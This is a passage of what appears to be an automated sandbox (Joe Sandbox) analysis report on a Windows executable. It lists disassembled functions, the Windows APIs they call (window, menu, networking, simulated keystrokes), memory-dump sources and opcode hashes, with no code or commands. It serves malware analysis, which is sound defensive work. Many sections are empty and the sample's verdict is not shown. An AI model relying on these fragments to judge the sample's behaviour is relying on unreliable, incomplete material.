                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 312a5a276b040bf83ca06446f599eea9174c71247db8bcd10d59bde365de7fac
                                                                                                                                                                                                                                                                                                        • Instruction ID: bea9009c4f8db694424fc9910f8983f80102f4455bbcdc928124c607385d8275
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 312a5a276b040bf83ca06446f599eea9174c71247db8bcd10d59bde365de7fac
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6C1597990464AEFDB10DFA9C580BEDBBB1FF58320F14841AE895E7250DB34A941EF60
                                                                                                                                                                                                                                                                                                        Function 00FED210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c3c9330a6908dc6b869430e64da1bb389b1762b0c40e1cca7d50a677b6b77605
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd5bce5b0fb35cb0effd51faebb1dc81ab6bfa546b3e2f86ac04cf4d7c83f2e1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3c9330a6908dc6b869430e64da1bb389b1762b0c40e1cca7d50a677b6b77605
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49614871D04384AFDB35BF76DC81B6D7BA8AF01330F04456DEA8497686E63AD801A751
                                                                                                                                                                                                                                                                                                        Function 01045B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01045C24
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 01045C65
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 01045C6B
                                                                                                                                                                                                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 01045C6F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010479F2: DeleteObject.GDI32(00000000), ref: 01047A1E
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01045CAB
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01045CB8
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01045CEB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01045D25
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01045D34
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d614ba5a9cf7a23a4ae7304e2d39340c68042a1aa3b1c1f05ff038eefdecb384
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6b033e73f05fb897c1d2f2124aab2250ddfc0ebfbea6bd7a5da248912bbf9f04
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d614ba5a9cf7a23a4ae7304e2d39340c68042a1aa3b1c1f05ff038eefdecb384
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 715190B5640209BFEF359E58CCC9BD83BA1BB05750F048161F6E49A1E1C77AA580DF85
                                                                                                                                                                                                                                                                                                        Function 00FB13A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00FF28D1
                                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00FF28EA
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FF28FA
                                                                                                                                                                                                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00FF2912
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FF2933
                                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00FF2942
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FF295F
                                                                                                                                                                                                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FB11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00FF296E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1268354404-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3fb7be1af27e5034c791236ef4b40be643891d17992d7f1662ef2a8f4620a3a0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8d90b6f1308499d1e71a468b7759716e94ee3bd958093b742b1ca76f12747001
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fb7be1af27e5034c791236ef4b40be643891d17992d7f1662ef2a8f4620a3a0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D519C74A00209EFDB20DF65CC95BAA7BB5FF58760F104528FA82972A0DB75E850EF50
                                                                                                                                                                                                                                                                                                        Function 0102CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102CBC7
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0102CBDA
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 0102CBEE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102CCB7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: GetLastError.KERNEL32 ref: 0102CD67
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: SetEvent.KERNEL32(?), ref: 0102CD7B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0102CC98: InternetCloseHandle.WININET(00000000), ref: 0102CD86
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1cc208337a42686b0fa5a9fff4bc5b4b8ed074ad19c174af5e0725a96034e82c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 161dc028cc5b0fbda5637badd0866d754452ca8a6aa2753e92bb8c976b6fbec8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cc208337a42686b0fa5a9fff4bc5b4b8ed074ad19c174af5e0725a96034e82c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC319EB5200759AFEB228FB5CA84A7EBBF8FF14200B10852DF9D683600D735E8149B60
                                                                                                                                                                                                                                                                                                        Function 01012EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetWindowThreadProcessId.USER32(?,00000000), ref: 010143AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: GetCurrentThreadId.KERNEL32 ref: 010143B4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01014393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,01012F00), ref: 010143BB
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 01012F0A
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 01012F28
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 01012F2C
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 01012F36
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01012F4E
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01012F52
                                                                                                                                                                                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 01012F5C
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01012F70
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01012F74
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 236d0d2467444d2eadf384e2a5057b6f5baad0de52241ea334e94b1acdd4a4ad
                                                                                                                                                                                                                                                                                                        • Instruction ID: db0d905245eb17d92eed29beaf83d5025604f6cb0c44bf5555576a93d59de350
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 236d0d2467444d2eadf384e2a5057b6f5baad0de52241ea334e94b1acdd4a4ad
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5001D8B07842107BFB2066A8DCCAF593F59DB5DB11F100015F798AE1E8C9F654448BA9
                                                                                                                                                                                                                                                                                                        Function 01044322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 010443C1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 010443D6
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010443F0
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01044435
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 01044462
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01044490
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: SysListView32
                                                                                                                                                                                                                                                                                                        • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                        • Opcode ID: bd1ab882e604cff164af5f64e85d93e2735cd11591d9cc14d75ac50c433fd1c3
                                                                                                                                                                                                                                                                                                        • Instruction ID: b6ef5aed254895640dfcf10e59200986927538060574672d2a21c5cd2f683807
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd1ab882e604cff164af5f64e85d93e2735cd11591d9cc14d75ac50c433fd1c3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4241C2B1A00319ABDF21DFA4CC88BEA7BA9FF48750F104166F984E7281D7759980CB90
                                                                                                                                                                                                                                                                                                        Function 0101C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101C6C4
                                                                                                                                                                                                                                                                                                        • IsMenu.USER32(00000000), ref: 0101C6E4
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 0101C71A
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(018E5C60), ref: 0101C76B
                                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(018E5C60,?,00000001,00000030), ref: 0101C793
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                        • String ID: 0$2
                                                                                                                                                                                                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3d2f3bcf26746ff56b194df60397324da705a9ee9cdef36ca8ea971d8dcfdaec
                                                                                                                                                                                                                                                                                                        • Instruction ID: 042b35b8a9d5ba14b990f6daba1eef11bf324efa5199d63791ce2b7dbb935ccc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d2f3bcf26746ff56b194df60397324da705a9ee9cdef36ca8ea971d8dcfdaec
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD51D0706402059BFF21CFACDAC8BAEBBF4BF58314F14419AE99197299D7B8D840CB51
                                                                                                                                                                                                                                                                                                        Function 0101D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0101D1BE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconLoad
                                                                                                                                                                                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                                                        • Opcode ID: 023d3a95b9e1d58e5711926eb48c2d1e74102d5d6dd10bf48e807b816d0795e4
                                                                                                                                                                                                                                                                                                        • Instruction ID: c6b1a8e958a5504b7dae52ec110f82c018fbb88c5df2da3a4287ef31b8875cbf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 023d3a95b9e1d58e5711926eb48c2d1e74102d5d6dd10bf48e807b816d0795e4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80112035648306BBE7065A99DC8AD6E77ED9F05760B10006FF9C0E6286D7BD66008365
                                                                                                                                                                                                                                                                                                        Function 0101E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                        • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                                                        • Opcode ID: d0535a87ce7c0ee03e306dec013fa427c7112794f93d721cf78f339064ecab15
                                                                                                                                                                                                                                                                                                        • Instruction ID: ce8fefff09d9d8114589f1531a4297826a92e090ce33a87d12d7523350d8148b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0535a87ce7c0ee03e306dec013fa427c7112794f93d721cf78f339064ecab15
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE1136719001157BEB21A764DC89EEE37ACFF11310F0401BAF995A6085EF7D96819750
                                                                                                                                                                                                                                                                                                        Function 0101F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 952045576-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 861cf2f240f4464965a00e045ddd75d24dc84bef3f593356f7c0df6b515aeb8a
                                                                                                                                                                                                                                                                                                        • Instruction ID: aa1793d9b9152ab423a59715ce765e4360304332af9ea4945c9aed3a7b379cf0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 861cf2f240f4464965a00e045ddd75d24dc84bef3f593356f7c0df6b515aeb8a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F419565D11119B6DB11EBF8CC86ACFB7A9AF05310F588463E518E3221FB38E255C3E6
                                                                                                                                                                                                                                                                                                        Function 00FCFBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 00FCFC41
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 0100FC15
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00FF39E2,00000004,00000000,00000000), ref: 0100FC98
